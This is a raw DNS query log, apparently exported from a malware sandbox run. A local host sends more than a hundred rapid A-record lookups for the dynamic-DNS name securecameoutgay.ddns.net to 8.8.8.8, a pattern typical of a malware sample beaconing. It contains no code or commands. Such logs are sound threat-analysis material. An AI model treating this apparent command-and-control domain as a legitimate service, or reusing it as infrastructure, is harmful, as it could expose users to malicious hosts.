                                                    Oct 12, 2024 23:06:05.633727074 CEST192.168.2.148.8.8.80x897cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.640595913 CEST192.168.2.148.8.8.80x897cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.647660971 CEST192.168.2.148.8.8.80x897cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.654449940 CEST192.168.2.148.8.8.80x897cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.661147118 CEST192.168.2.148.8.8.80xa3a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.667877913 CEST192.168.2.148.8.8.80xa3a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.674817085 CEST192.168.2.148.8.8.80xa3a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.681411028 CEST192.168.2.148.8.8.80xa3a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.688368082 CEST192.168.2.148.8.8.80xa3a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.694951057 CEST192.168.2.148.8.8.80xd61dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.701769114 CEST192.168.2.148.8.8.80xd61dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.708461046 CEST192.168.2.148.8.8.80xd61dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.715255022 CEST192.168.2.148.8.8.80xd61dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.721532106 CEST192.168.2.148.8.8.80xd61dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.727946043 CEST192.168.2.148.8.8.80x5a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.734322071 CEST192.168.2.148.8.8.80x5a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.740665913 CEST192.168.2.148.8.8.80x5a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.747612953 CEST192.168.2.148.8.8.80x5a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.754256964 CEST192.168.2.148.8.8.80x5a40Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.761466980 CEST192.168.2.148.8.8.80x85fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.768059015 CEST192.168.2.148.8.8.80x85fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.774804115 CEST192.168.2.148.8.8.80x85fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.781481028 CEST192.168.2.148.8.8.80x85fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.788098097 CEST192.168.2.148.8.8.80x85fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.795783043 CEST192.168.2.148.8.8.80xf48cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.802406073 CEST192.168.2.148.8.8.80xf48cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.808847904 CEST192.168.2.148.8.8.80xf48cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.815547943 CEST192.168.2.148.8.8.80xf48cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.822464943 CEST192.168.2.148.8.8.80xf48cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.829180002 CEST192.168.2.148.8.8.80xa5caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.836354017 CEST192.168.2.148.8.8.80xa5caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.842955112 CEST192.168.2.148.8.8.80xa5caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.849617004 CEST192.168.2.148.8.8.80xa5caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.856648922 CEST192.168.2.148.8.8.80xa5caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.863265038 CEST192.168.2.148.8.8.80x223dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.869842052 CEST192.168.2.148.8.8.80x223dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.876146078 CEST192.168.2.148.8.8.80x223dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.882658005 CEST192.168.2.148.8.8.80x223dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.889199018 CEST192.168.2.148.8.8.80x223dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.895931959 CEST192.168.2.148.8.8.80x4c61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.902879000 CEST192.168.2.148.8.8.80x4c61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.909430027 CEST192.168.2.148.8.8.80x4c61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.915915966 CEST192.168.2.148.8.8.80x4c61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.922292948 CEST192.168.2.148.8.8.80x4c61Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.929056883 CEST192.168.2.148.8.8.80x87c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.935976028 CEST192.168.2.148.8.8.80x87c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.942357063 CEST192.168.2.148.8.8.80x87c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.950057983 CEST192.168.2.148.8.8.80x87c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.958528042 CEST192.168.2.148.8.8.80x87c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.965483904 CEST192.168.2.148.8.8.80x7d41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.972707033 CEST192.168.2.148.8.8.80x7d41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.979532003 CEST192.168.2.148.8.8.80x7d41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.986186028 CEST192.168.2.148.8.8.80x7d41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.993087053 CEST192.168.2.148.8.8.80x7d41Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.000030041 CEST192.168.2.148.8.8.80x909eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.007112980 CEST192.168.2.148.8.8.80x909eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.013595104 CEST192.168.2.148.8.8.80x909eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.020374060 CEST192.168.2.148.8.8.80x909eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.027314901 CEST192.168.2.148.8.8.80x909eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.034081936 CEST192.168.2.148.8.8.80x1778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.040934086 CEST192.168.2.148.8.8.80x1778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.048051119 CEST192.168.2.148.8.8.80x1778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.054929972 CEST192.168.2.148.8.8.80x1778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.062078953 CEST192.168.2.148.8.8.80x1778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.068890095 CEST192.168.2.148.8.8.80x87ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.075309038 CEST192.168.2.148.8.8.80x87ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.082149982 CEST192.168.2.148.8.8.80x87ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.088893890 CEST192.168.2.148.8.8.80x87ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.095901966 CEST192.168.2.148.8.8.80x87ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.102813959 CEST192.168.2.148.8.8.80x2160Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.109272003 CEST192.168.2.148.8.8.80x2160Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.116003990 CEST192.168.2.148.8.8.80x2160Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.122859001 CEST192.168.2.148.8.8.80x2160Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.129868984 CEST192.168.2.148.8.8.80x2160Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.136852980 CEST192.168.2.148.8.8.80x9af1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.143683910 CEST192.168.2.148.8.8.80x9af1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.150861025 CEST192.168.2.148.8.8.80x9af1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.157746077 CEST192.168.2.148.8.8.80x9af1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.164602995 CEST192.168.2.148.8.8.80x9af1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.171219110 CEST192.168.2.148.8.8.80xd198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.177792072 CEST192.168.2.148.8.8.80xd198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.184508085 CEST192.168.2.148.8.8.80xd198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.191283941 CEST192.168.2.148.8.8.80xd198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.198343039 CEST192.168.2.148.8.8.80xd198Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.205223083 CEST192.168.2.148.8.8.80xb7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.211950064 CEST192.168.2.148.8.8.80xb7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.219180107 CEST192.168.2.148.8.8.80xb7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.226113081 CEST192.168.2.148.8.8.80xb7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.233211994 CEST192.168.2.148.8.8.80xb7ccStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.240192890 CEST192.168.2.148.8.8.80x781bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.246793032 CEST192.168.2.148.8.8.80x781bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.253426075 CEST192.168.2.148.8.8.80x781bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.260340929 CEST192.168.2.148.8.8.80x781bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.267425060 CEST192.168.2.148.8.8.80x781bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.274101019 CEST192.168.2.148.8.8.80xd7bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.281019926 CEST192.168.2.148.8.8.80xd7bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.287708044 CEST192.168.2.148.8.8.80xd7bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.294394016 CEST192.168.2.148.8.8.80xd7bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.301177979 CEST192.168.2.148.8.8.80xd7bbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.308125019 CEST192.168.2.148.8.8.80x3959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.315242052 CEST192.168.2.148.8.8.80x3959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.321940899 CEST192.168.2.148.8.8.80x3959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.329147100 CEST192.168.2.148.8.8.80x3959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.336540937 CEST192.168.2.148.8.8.80x3959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.343523979 CEST192.168.2.148.8.8.80x1ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.350369930 CEST192.168.2.148.8.8.80x1ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.357347965 CEST192.168.2.148.8.8.80x1ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.364321947 CEST192.168.2.148.8.8.80x1ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.371530056 CEST192.168.2.148.8.8.80x1ba0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.378698111 CEST192.168.2.148.8.8.80x7214Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.388370991 CEST192.168.2.148.8.8.80x7214Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.399162054 CEST192.168.2.148.8.8.80x7214Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.405980110 CEST192.168.2.148.8.8.80x7214Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.412813902 CEST192.168.2.148.8.8.80x7214Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.419435024 CEST192.168.2.148.8.8.80xb93aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.426605940 CEST192.168.2.148.8.8.80xb93aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.434998989 CEST192.168.2.148.8.8.80xb93aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.444706917 CEST192.168.2.148.8.8.80xb93aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.451689005 CEST192.168.2.148.8.8.80xb93aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.458718061 CEST192.168.2.148.8.8.80xdb94Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.465979099 CEST192.168.2.148.8.8.80xdb94Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.473160982 CEST192.168.2.148.8.8.80xdb94Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.480094910 CEST192.168.2.148.8.8.80xdb94Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.487472057 CEST192.168.2.148.8.8.80xdb94Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.495352983 CEST192.168.2.148.8.8.80x28afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.502695084 CEST192.168.2.148.8.8.80x28afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.509859085 CEST192.168.2.148.8.8.80x28afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.517245054 CEST192.168.2.148.8.8.80x28afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.524981976 CEST192.168.2.148.8.8.80x28afStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.532457113 CEST192.168.2.148.8.8.80xeab6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.539534092 CEST192.168.2.148.8.8.80xeab6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.546930075 CEST192.168.2.148.8.8.80xeab6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.553837061 CEST192.168.2.148.8.8.80xeab6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.560836077 CEST192.168.2.148.8.8.80xeab6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.568223953 CEST192.168.2.148.8.8.80x235aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.575510979 CEST192.168.2.148.8.8.80x235aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.582545042 CEST192.168.2.148.8.8.80x235aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.589641094 CEST192.168.2.148.8.8.80x235aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.596798897 CEST192.168.2.148.8.8.80x235aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.604089975 CEST192.168.2.148.8.8.80x7b60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.611605883 CEST192.168.2.148.8.8.80x7b60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.618793964 CEST192.168.2.148.8.8.80x7b60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.626372099 CEST192.168.2.148.8.8.80x7b60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.633356094 CEST192.168.2.148.8.8.80x7b60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.640687943 CEST192.168.2.148.8.8.80x3884Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.647671938 CEST192.168.2.148.8.8.80x3884Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.655647993 CEST192.168.2.148.8.8.80x3884Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.663255930 CEST192.168.2.148.8.8.80x3884Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.670465946 CEST192.168.2.148.8.8.80x3884Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.677814960 CEST192.168.2.148.8.8.80xe9f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.685169935 CEST192.168.2.148.8.8.80xe9f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.692311049 CEST192.168.2.148.8.8.80xe9f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.699301958 CEST192.168.2.148.8.8.80xe9f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.706212044 CEST192.168.2.148.8.8.80xe9f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.713049889 CEST192.168.2.148.8.8.80xe18aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.719839096 CEST192.168.2.148.8.8.80xe18aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.726435900 CEST192.168.2.148.8.8.80xe18aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.733562946 CEST192.168.2.148.8.8.80xe18aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.740310907 CEST192.168.2.148.8.8.80xe18aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.747745991 CEST192.168.2.148.8.8.80x34a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.754682064 CEST192.168.2.148.8.8.80x34a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.761755943 CEST192.168.2.148.8.8.80x34a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.768642902 CEST192.168.2.148.8.8.80x34a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.777070045 CEST192.168.2.148.8.8.80x34a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.785005093 CEST192.168.2.148.8.8.80x51c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.793587923 CEST192.168.2.148.8.8.80x51c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.800699949 CEST192.168.2.148.8.8.80x51c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.808187962 CEST192.168.2.148.8.8.80x51c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.815754890 CEST192.168.2.148.8.8.80x51c6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.822819948 CEST192.168.2.148.8.8.80x8a2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.830452919 CEST192.168.2.148.8.8.80x8a2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.837217093 CEST192.168.2.148.8.8.80x8a2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.844182968 CEST192.168.2.148.8.8.80x8a2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.851398945 CEST192.168.2.148.8.8.80x8a2cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.858592987 CEST192.168.2.148.8.8.80x3940Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.865572929 CEST192.168.2.148.8.8.80x3940Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.873538971 CEST192.168.2.148.8.8.80x3940Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.881711006 CEST192.168.2.148.8.8.80x3940Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.889760017 CEST192.168.2.148.8.8.80x3940Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.898638964 CEST192.168.2.148.8.8.80x208cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.908121109 CEST192.168.2.148.8.8.80x208cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.916955948 CEST192.168.2.148.8.8.80x208cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.923959970 CEST192.168.2.148.8.8.80x208cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.931343079 CEST192.168.2.148.8.8.80x208cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.938632965 CEST192.168.2.148.8.8.80x9804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.945717096 CEST192.168.2.148.8.8.80x9804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.952912092 CEST192.168.2.148.8.8.80x9804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:06.959527969 CEST192.168.2.148.8.8.80x9804Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
